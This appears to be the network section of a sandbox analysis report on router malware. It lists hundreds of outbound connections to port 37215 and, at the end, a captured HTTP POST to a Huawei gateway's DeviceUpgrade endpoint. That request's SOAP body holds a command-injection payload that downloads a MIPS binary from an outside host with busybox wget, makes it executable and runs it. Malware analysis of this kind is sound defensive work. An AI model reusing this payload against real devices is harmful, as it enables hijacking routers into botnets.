          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.233.165.119:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.80.10.222:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.199.71.141:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.72.2.134:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.97.141.127:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.191.63.29:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.139.52.188:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.245.183.230:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.18.236.6:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.79.172.220:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.238.224.79:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.249.125.2:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.13.155.161:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.151.23.88:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.33.232.89:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.215.215.104:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.68.172.139:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.137.241.91:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.71.254.60:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.80.5.217:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.218.115.231:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.107.99.183:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.198.33.59:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.243.215.174:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.246.247.175:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.89.63.183:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.127.217.93:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.240.254.59:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.129.30.140:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.183.76.9:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.115.183.174:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.216.42.135:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.114.119.54:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.239.136.95:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.209.52.144:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.225.62.99:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.101.131.68:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.114.119.175:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.29.4.215:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.84.138.115:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.39.160.83:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.92.142.30:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.20.73.21:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.33.221.5:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.14.129.186:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.33.63.87:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.80.87.197:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.214.250.242:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.160.137.1:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.236.120.28:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.126.159.167:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.129.174.150:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.199.60.93:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.9.172.76:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.99.170.230:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.250.121.148:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.121.70.97:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.65.245.46:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.212.91.196:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.152.166.172:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.49.119.80:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.30.221.186:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.219.228.221:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.78.143.166:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.141.196.164:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.163.124.17:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.39.222.203:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.56.241.214:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.229.59.42:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.35.240.176:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.11.67.175:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.221.149.119:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.51.163.157:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.134.231.27:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.124.162.20:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.76.130.82:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.151.185.150:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.58.180.53:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.4.16.208:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.111.180.24:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.76.215.181:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.46.76.134:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.155.56.244:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.60.175.252:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.164.190.46:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.50.177.180:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.11.234.71:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.78.14.23:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.47.39.144:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.228.187.232:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.192.236.217:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.39.217.97:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.184.34.62:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.179.192.203:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.210.47.55:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.38.109.86:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.153.90.7:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.116.236.157:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.27.12.102:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.255.107.29:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.94.125.48:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.83.78.200:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.206.65.53:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.101.136.237:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.122.240.172:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.3.129.3:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.59.3.73:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.159.201.255:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.235.204.226:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.183.23.47:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.197.147.80:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.30.210.59:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.82.24.28:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.145.1.252:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.202.75.102:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.27.71.62:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.147.13.185:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.105.66.175:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.190.206.108:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.108.104.133:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.55.219.98:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.227.2.239:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.57.6.130:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.139.190.122:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.17.199.225:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.103.191.42:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.51.116.203:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.129.25.248:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.86.28.152:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.91.60.222:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.109.94.3:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.225.154.176:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.44.65.231:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.9.231.217:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.135.116.172:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.112.171.253:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.185.119.64:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.237.171.156:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.135.46.129:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.87.128.160:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.68.87.102:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.103.244.74:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.230.1.198:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.47.183.185:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.42.183.82:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.57.252.80:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.95.160.103:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.230.203.137:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.251.13.112:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.10.46.19:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.10.195.93:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.77.65.82:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.125.161.40:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.241.23.59:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.212.109.56:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.19.88.84:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.251.153.102:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.48.240.109:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.138.239.7:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.71.131.244:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.149.114.12:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.236.76.86:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.169.242.65:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.180.114.167:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.121.10.193:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.157.237.126:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.12.233.171:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.212.200.174:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.108.97.251:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.126.60.98:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.148.6.159:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.55.147.96:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.247.74.27:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.165.87.215:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.26.156.242:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.203.23.99:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.54.255.55:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.117.10.250:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.249.29.3:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.199.201.58:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.26.32.86:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.111.92.212:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.187.154.104:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.214.8.15:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.178.98.187:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.135.91.189:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.118.219.82:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.80.82.185:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.83.147.177:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.76.79.209:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.58.191.145:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.92.8.61:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.143.95.244:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.40.97.28:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.98.112.120:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.140.0.121:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.69.175.88:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.14.114.58:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.243.7.134:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.114.108.196:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.116.25.203:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.52.240.230:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.0.175.205:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.228.250.20:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.247.185.156:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.236.115.82:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.164.187.233:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.207.18.66:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.221.10.17:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.41.194.194:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.141.140.191:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.238.224.95:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.25.126.128:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.150.206.119:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.157.73.108:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.105.137.145:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.175.196.108:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.45.23.44:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.7.11.6:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.171.134.175:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.177.114.32:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.73.29.54:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.223.220.38:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.56.156.138:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.10.76.57:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.121.161.125:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.18.180.165:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.191.129.92:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.253.160.148:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.19.133.53:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.52.152.139:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.31.2.194:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.124.91.64:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.8.190.215:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.163.220.196:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.232.235.77:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.91.227.225:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.168.106.183:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.202.95.12:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.53.15.132:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.74.171.171:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.19.236.179:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.33.241.19:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.77.119.186:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.159.109.83:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.252.154.183:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.118.171.66:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.239.159.184:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.248.129.210:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.227.171.38:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.140.104.248:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.91.64.231:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.94.61.100:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.153.154.139:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.117.24.223:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.82.46.84:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.144.176.51:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.52.77.150:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.18.107.185:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.87.74.169:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.26.194.106:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.11.138.229:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.34.97.255:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.178.69.201:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.91.178.225:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.95.25.222:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.114.2.150:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.62.98.17:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.58.147.174:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.117.180.202:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.199.130.52:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.228.202.145:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.183.15.101:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.166.39.19:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.210.167.156:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.186.44.61:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.202.167.35:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.0.120.153:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.221.36.125:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.150.89.133:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.60.216.74:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.24.42.89:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.183.233.206:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.127.180.203:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.110.134.77:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.98.15.199:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.193.92.126:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.246.2.53:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.77.111.122:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.27.158.180:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.204.133.209:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.203.4.199:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.154.45.34:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.87.226.73:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.217.205.92:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.106.131.49:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.96.45.119:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.115.9.244:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.234.180.204:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.231.42.216:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.97.165.31:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.38.186.19:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.242.170.4:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.100.11.44:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.72.248.64:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.110.90.234:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.57.181.66:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 197.14.42.126:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.138.86.248:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.11.250.233:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.6.65.186:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.217.82.96:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.115.207.212:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.85.205.32:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 41.154.122.75:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.34.158.58:37215
          Source: global trafficTCP traffic: 192.168.2.23:59534 -> 156.52.112.133:37215
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
